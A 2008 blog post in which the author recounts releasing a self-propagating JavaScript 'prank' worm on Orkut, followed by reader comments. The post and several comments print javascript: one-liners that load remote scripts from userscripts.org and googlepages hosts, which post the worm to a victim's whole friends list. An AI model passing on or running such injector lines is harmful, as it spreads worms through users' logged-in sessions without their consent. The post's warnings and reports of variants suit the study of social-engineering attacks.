Thursday, January 24, 2008

Orkut.com vs Cyber Sannyasi

Alright, seems like it's time to write about something that I did early this week (21st Jan 2008) with Google's most popular Orkut.com. Most of the Orkut users would've seen this message in their scrapbook sent by one of their friends...

Here are some tips to make your cell phone battery last longer. Just copy the JavaScript, paste it in your address bar and hit ENTER

javascript:d=document;c=d.createElement(’script’);d.body.appendChild(c);c.src=’http://userscripts.org/scripts/source/20885.user.js’void(0)

trust me, you’ll find this newsletter informative! [;)] (...ending with a sarcastic wink !)

And, if they did what it suggested them to do, I'm sure, they had enjoyed the Cyber Sannyasi's cool Technology newsletter that featured an excellent YouTube video and a wikihow.com's article on extending your cell phone battery's life.

For those who're seeing this message for the first time here, be patient, you may see it in your scrapbook soon as this script is being misused by many users. Orkut has not fixed the bug completely.

Let me briefly explain what this JavaScript did...

When logged into Orkut.com you're asked by your friend to run this JavaScript from the address bar. This injects the actual prank Script from http://userscripts.org/scripts/source/20885.user.js that runs in the background and renders the newsletter within the same browser window. While the user is engrossed with YouTube video and battery tips - the sript runs asynchronously performing those actions that it was programmed to do. It first sends a read receipt with timestamp back to the author's scrapbook (that's for my tracking purposes). Then fetches the current logged-on user's friends list from Compose.aspx page, builds AJAX based WebRequests and posts the scrap message to everyone on that list. The users were completely unaware of what had just happened until somebody on their list did the same. It forced Orkut to do one more nasty thing... When the user's friend-count exceeded 150 with 150 scraps originating rapidly with a time gap of 500 milliseconds, orkut blocked their write access for an indefinite period of time assuming he/she was a potential spammer [bug? it need not take 150 for the damage... damage has already been done at this point]. As mentioned earlier, this was just a prank and never touched users' sensitive information nor transmitted any cookies nowhere as some bloggers falsely believed (...and scared). In short, it meant no harm to anybody, but for the nuisance it created.

The script was later flagged as spam by many and eventually got deleted from the site where it was hosted. The hit counter showed that it was accessed 70,000 times within 36hrs before it went offline prematurely. Well, in a much popular social networking site like orkut.com this number could grow astronomically over time.

Why did I do that ?

Hmm, good question. Well the story goes like this.., Inspired by all those "SCRAP ALL" and tons of other similar scripts (...this one's a mutant of SCRAP ALL), I wanted to take Orkut on a more profound spammer-coaster ride propelled by its own do-all-what-I'm-told ignorant users, I wanted to exploit a bug in Orkut.com, and I wanted to educate the users - in a safe but annoying way - about the harms of running scripts while being logged on. Remember the bold red message I had at the bottom of that newsletter ?

Protect your account: Never run any script while logged into orkut.com, no matter what it claims to do. Including this newsletter or "Scrap To All" thingy... LOL!!

Yep, I put the same security tip that often appears in BOLD on the home page after you login. I commend Orkut in this regard for constantly reminding its users not to run any scripts while logged in.

My advice:

I believe, there are sections where Orkut can improve its anti-spam, anti-bot techniques. Like word filter, that could immediately pop up a captcha when trying to enter URLs or potential script texts in Srapbook. Employ the same flood-prevention algorithms to disallow users from posting similar messages within a specific time. Currently, this works only on a One-One basis. That is, one user cannot send consecutively similar scraps to the same friend, but, CAN definitely send consecutively similary scraps to one friend at a time - a potential for *SPAMs* like this one [;)] ( ... another sarcastic wink!). Hello Orkut, if you're reading this post, get this fixed asap as several users have already started hosting this script at multiple locations and misusing it.

For now, if you want to keep spam off of orkut.com just remember the red bold message above. Or, if you're the one who is really curious to see what happens when you run scripts... then... don't curse script-authors for the outcome... It's YOUR PROBLEM & YOU CHOSE TO DO IT!

As a final note, I would like to apologize for the frustration, annoyance, confusion & inconvenience caused to several thousand users who fell for this prank. I would also like to apologize the guys at userscripts.org for using their site as a hosting place for this script.

Once again....  I love Orkut.com and let's keep Orkut Beautiful...  [:)] (...a hearty smile) !!

15 comments:

Anonymous said...

you have opened up yet another way of spamming orkut. SPAMMER! i don't like you

Dee said...

Gud dude, you are working in gud stream to protect us guys from orkut spammer, Thanks keep it up

Anonymous said...

Good work spamming clueless orkut users. :| Pls do include SPAMMING in your areas of interest.

Anonymous said...

New One on the prowl...

javascript:d=document;c=d.createElement('script');d.body.appendChild(c);c.src='http://userscripts.org/scripts/source/21098.user.js';void(0)

Thinathayalan (Dheenu) Ganesan said...

Yep, that one's already reported spam. Now it's gone. From my tracking log, the one that is still active is hosted by somebody named Vasvi Saran at googlepages...

'http://javascript10034.googlepages.com/20885.user.js'

The spam message would look something like this...

________________________________
Here are some tips to make your cell phone battery last longer..BY VASVI SARAN.. Just copy the JavaScript, paste it in your address bar and PRESS ENTER

javascript:d=document;c=d.createElement('script');d.body.appendChild(c);c.src='http://javascript10034.googlepages.com/20885.user.js';void(0)

trust me, you'll find this newsletter informative!
___________________________________

I've already reported the link as SPAM in Googlepages couple of days ago.

Now the ball is in Google's court !!

Thinathayalan (Dheenu) Ganesan said...

Yet another one... (misused by Jinesh Jain)

javascript:d=document;c=d.createElement('script');d.body.appendChild(c);c.src='http://tricks80.googlepages.com/20885.user.js';void(0)

Thinathayalan (Dheenu) Ganesan said...

And another one..

javascript:d=document;c=d.createElement('script');d.body.appendChild(c);c.src='http://userscripts.googlepages.com/news.user.js';void(0)

Sameer C Thiruthikad said...

http://coolwayfarer.blogspot.com/2008/02/orkut-and-scraps-with-scripts.html

Sunil said...

I got a similar one in my scrap book yesterday

javascript:d=document;c=d.createElement('script');d.body.appendChild(c);c.src='http://shiva9059.googlepages.com/newsletter.js';void(0)

Thinathayalan (Dheenu) Ganesan said...

Thanks sunil,
I just happened to see couple of new ones from my logs...


javascript:d=document;c=d.createElement('script');d.body.appendChild(c);c.src='http://krunalved.googlepages.com/news.user.js';void(0)


javascript:d=document;c=d.createElement('script');d.body.appendChild(c);c.src='http://toashishmantri.googlepages.com/amantri.js';void(0)

ashar said...

good dude as its is said all wells if ends well although i don't think what u did was good because u open the way for spammer and shows a wrong way for those who want use it in a wrong way
but still this blog of u has rectify all ur sin

free calling guy said...

hi
mr Thinathayalan Ganesan
find ur blog good & informaive

http://freeworld-calls-sms.blogspot.com

Suraj said...

dude, this is crazy. do something useful

Manjiri said...

God...u scared me

neways dat was indeed an eye opener

thanks dude ur efforts r appreciated

r4 ds said...

Hi,
I am currently using orkut and facebook i always choose orkut as my regular usage..
Because orkut was really nice social site and this article giving me info about orkut so i really like it..